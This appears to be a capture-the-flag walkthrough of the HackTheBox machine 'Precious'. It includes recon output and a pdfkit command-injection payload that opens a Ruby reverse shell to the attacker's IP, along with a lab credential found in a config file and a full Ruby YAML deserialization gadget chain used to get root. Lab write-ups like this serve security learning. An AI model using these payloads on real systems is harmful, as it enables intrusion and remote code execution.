Recon
-
Host name
- http://precious.htb
sudo echo "10.10.11.189 precious.htb" >> /etc/hosts
-
Rustscan
rustscan -a 10.10.11.189
Open 10.10.11.189:22
Open 10.10.11.189:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:48 EST
Initiating Ping Scan at 13:48
Scanning 10.10.11.189 [2 ports]
Completed Ping Scan at 13:48, 0.53s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:48
Completed Parallel DNS resolution of 1 host. at 13:48, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:48
Scanning 10.10.11.189 [2 ports]
Discovered open port 22/tcp on 10.10.11.189
Discovered open port 80/tcp on 10.10.11.189
Completed Connect Scan at 13:48, 0.33s elapsed (2 total ports)
Nmap scan report for 10.10.11.189
Host is up, received syn-ack (0.48s latency).
Scanned at 2022-12-17 13:48:42 EST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
- Directory Brute force
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://precious.htb/FUZZ
none
- VHOSTS
gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u precious.htb
none
Next Step
Since I did not find any subdomains or other web pages on the web server I decide to look at the main page to see if I could find a vulnerability. I began by spinning up a PHP web server using the php -S 0.0.0.0:80
command. I then create a simple HTML page that had some text and converted it to a PDF using the online PDF converter on http://precious.htb. Once I had a PDF that the web server made I used the exiftool ngveoebbpujxmgb2pxfbmu5p3cr7ddg3.pdf
command to see what generated the PDF document.
ExifTool Version Number : 12.52
File Name : ngveoebbpujxmgb2pxfbmu5p3cr7ddg3.pdf
Directory : .
File Size : 4.6 kB
File Modification Date/Time : 2022:12:18 17:56:17-05:00
File Access Date/Time : 2022:12:18 17:56:17-05:00
File Inode Change Date/Time : 2022:12:18 17:56:18-05:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Creator : Generated by pdfkit v0.8.6
Once I saw that the PDF file was created by pdfkit v0.8.6 I new that I could research and see if their were any CVE for this particular PDF generator. After a quick search I found an GitHub Repository that talked about this CVE. The GitHub repository had a payload that could simply be pasted in to the form on the target web page and it would create an reverse shell on the target server, all I had to do was replace their IP Address with my IP Address and start pwncat
Payload = http://10.10.14.148/?name=%20` ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.148",4444))'`
pwncat -l 4444 --self-inject /bin/bash:10.10.14.148:4445
I then had a reverse shell on the target system.
Privilege Escalation
The first thing I did in this machine was to start going though the folders in the ruby
users home directory. After looking through all of the directory I found a file called config
in the .bundle directory. The config
file contained the following password and username henry:Q3c1AqGHtoI0aXAYFH
. With this username and password I ssh in to the precious.htb machine. Since is was elevated to the henry user I got the user flag by running cat /home/henry/user.txt
command.
Now that I had escalated my privileges to the henry
user I ran the sudo -l
command and saw that this use could only run the /opt/update_dependencies.rb
script. Once I had discovered the this file I decided to see what it contained. After looking through the source code for this scripted I saw that it imported a yaml library to parse a yaml file. Armed with this information I looked up vulnerabilities that effect yaml parser and discovered a yaml deserialization vulnerability in the ruby yaml library.
Yaml POC
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: PLACE_CMD_HERE
method_id: :resolve
When you put this in side the yaml file that the ruby script opens it will cause what ever command that is were the PLACE_CMD_HERE
text is will run as root. Taking this information I put /bin/bash
as the command to run which when I called the ruby script as root it dropped me in to an interactive bash terminal. Now that I was root I ran the cat /root/root.txt
command to get the root.txt flag.